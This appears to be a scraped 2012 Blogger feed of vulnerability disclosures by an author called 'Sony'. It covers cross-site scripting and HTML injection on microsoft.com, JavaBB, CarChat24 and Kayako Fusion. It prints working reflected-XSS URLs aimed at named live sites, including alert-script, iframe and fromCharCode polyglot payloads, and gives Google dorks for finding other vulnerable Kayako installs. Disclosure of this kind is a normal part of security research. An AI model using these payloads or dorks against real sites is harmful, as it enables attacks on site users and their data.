http://verify.deviantart.com/update<br />
<br />
Email Address: our xss code.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-dOuwVZ7dq8g/T2hbnpfrJ0I/AAAAAAAAAxU/cJCTGiG5kgs/s1600/devian.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-dOuwVZ7dq8g/T2hbnpfrJ0I/AAAAAAAAAxU/cJCTGiG5kgs/s400/devian.JPG" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-28528004118502349562012-03-19T05:43:00.001-10:002012-03-19T05:49:09.633-10:00Microsoft.com Cross Site Scripting<b># Date: 19.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog: http://flexxpoint.blogspot.com/<br />
..................................................................</b><br />
<br />
<b>For Ryuzaki Lawlet:</b><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://s.rimg.info/dd4118cdca0289ab90bcc951bc3f1c72.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="30" width="35" src="http://s.rimg.info/dd4118cdca0289ab90bcc951bc3f1c72.gif" /></a></div><br />
http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html<br />
<br />
Demo:<br />
<br />
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-iQT5Ywe2XL8/T2dQ--4a5WI/AAAAAAAAAxE/IdkN2KNwze4/s1600/microsoft.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-iQT5Ywe2XL8/T2dQ--4a5WI/AAAAAAAAAxE/IdkN2KNwze4/s400/microsoft.JPG" /></a></div><br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/4kJL2Rt-FKo" frameborder="0" allowfullscreen></iframe>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-36574668150868080452012-03-18T04:32:00.002-10:002012-03-18T04:33:57.878-10:00JavaBB 0.99 Cross Site Scripting<b># Exploit Title: JavaBB 0.99 Cross Site Scripting<br />
# Date: 18.03.2012<br />
# Author: Sony<br />
# Software Link: http://www.javabb.org/<br />
# Web Browser : Mozilla Firefox<br />
# Site : http://insecurity.ro<br />
# PoC:<br />
http://st2tea.blogspot.com/2012/03/javabb-099-cross-site-scripting.html<br />
..................................................................</b><br />
<br />
<b>Well, we have a cross site scripting in JavaBB 0.99<br />
<br />
Demo:<br />
</b><br />
<br />
http://javafree.uol.com.br/pm.externalSend.jbb?userId=42888&username=teapro%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-66dUUOLCT-A/T2XxgUTFp1I/AAAAAAAAAw4/zz2wzSeHuhg/s1600/javabb.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-66dUUOLCT-A/T2XxgUTFp1I/AAAAAAAAAw4/zz2wzSeHuhg/s400/javabb.JPG" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-32031871424097903262012-03-17T20:28:00.002-10:002012-03-17T20:31:10.143-10:00CarChat24 HTML Injection# Exploit Title: CarChat24 HTML Injection<br />
# Date: 18.03.2012<br />
# Author: Sony<br />
# Software Link: http://www.carchat24.com/<br />
# Web Browser : Mozilla Firefox<br />
# Site : http://insecurity.ro<br />
# PoC:<br />
http://st2tea.blogspot.com/2012/03/carchat24-html-injection.html<br />
..................................................................<br />
<br />
We can see a simple html code injection in carchat24.<br />
<br />
Click on windows and put our html code. Not a critical bug,but it's a bug.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-0HC1S1XH_10/T2WAceDT7FI/AAAAAAAAAws/IVjCqBQLxkA/s1600/car24.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-0HC1S1XH_10/T2WAceDT7FI/AAAAAAAAAws/IVjCqBQLxkA/s400/car24.JPG" /></a></div>Sonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0tag:blogger.com,1999:blog-791799492554981317.post-9706765556716576052012-03-16T20:36:00.011-10:002012-03-19T20:11:21.956-10:00Comodo.com and Agv.sg Cross Site Scripting<b>Important:<br />
<br />
A similar bug was found in Kayako Support Suite by Positive Technologies:<br />
<br />
http://packetstormsecurity.org/files/108595/Kayako-Support-Suite-3.70.02-stable-Cross-Site-Scripting.html<br />
</b><br />
<b><br />
Today (20.03.2012) I received a email from Kayako and they reported that bug has been fixed. You can read about it here:<br />
<br />
http://wiki.kayako.com/display/DOCS/4.40.985</b><br />
<br />
<b># Exploit Title: Kayako Fusion Cross Site Scripting <br />
# Date: 17.03.2012<br />
# Author: Sony</b><br />
<b># Software Link:</b> http://www.kayako.com/<br />
<b># Version: all version</b><br />
<b># Google Dorks: inurl:Base/UserRegistration/ or intitle:Powered by Kayako Fusion Help Desk Software<br />
# Web Browser : Mozilla Firefox</b><br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b><br />
http://st2tea.blogspot.com/2012/03/kayako-fusion-cross-site-scripting.html<br />
<b>..................................................................</b><br />
<b><br />
Well, we have a cross site scripting in Kayako Fusion.<br />
<br />
Our xss in /Tickets/Submit.<br />
<br />
Put our code in the all fields and press button Submit.<br />
<br />
Click on View Tickets and open our ticket. We can see a Persistent XSS. </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-XIol_NGfkY4/T2QwnI6O1yI/AAAAAAAAAv8/VocNLueIcSI/s1600/yeah.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-XIol_NGfkY4/T2QwnI6O1yI/AAAAAAAAAv8/VocNLueIcSI/s400/yeah.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-hSBqYUG9mVk/T2QwrC7SfeI/AAAAAAAAAwI/t3VfDrmnsUc/s1600/yeah2.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-hSBqYUG9mVk/T2QwrC7SfeI/AAAAAAAAAwI/t3VfDrmnsUc/s400/yeah2.JPG" /></a></div><b><br />
A lot of web sites use Kayako Fusion.<br />
<br />
We can see Comodo</b><br />
(SupportSuite v3.70.02)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NuPPTVnYUKA/T2Qw2JbVMQI/AAAAAAAAAwU/ilLYojJ_gus/s1600/comodo.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-NuPPTVnYUKA/T2Qw2JbVMQI/AAAAAAAAAwU/ilLYojJ_gus/s400/comodo.JPG" /></a></div><br />
<b>Avg</b><br />
(fusion)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-e3EFHjpd_f0/T2Qw7WMsNYI/AAAAAAAAAwg/MvkVl_n8fhQ/s1600/avg.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-e3EFHjpd_f0/T2Qw7WMsNYI/AAAAAAAAAwg/MvkVl_n8fhQ/s400/avg.JPG" /></a></div><br />
<b>etc..</b><br />
<br />
Russian Google Dorks:<br />
<br />
intitle:основано на kayako fusion help deskSonyhttp://www.blogger.com/profile/07357857456568656987noreply@blogger.com0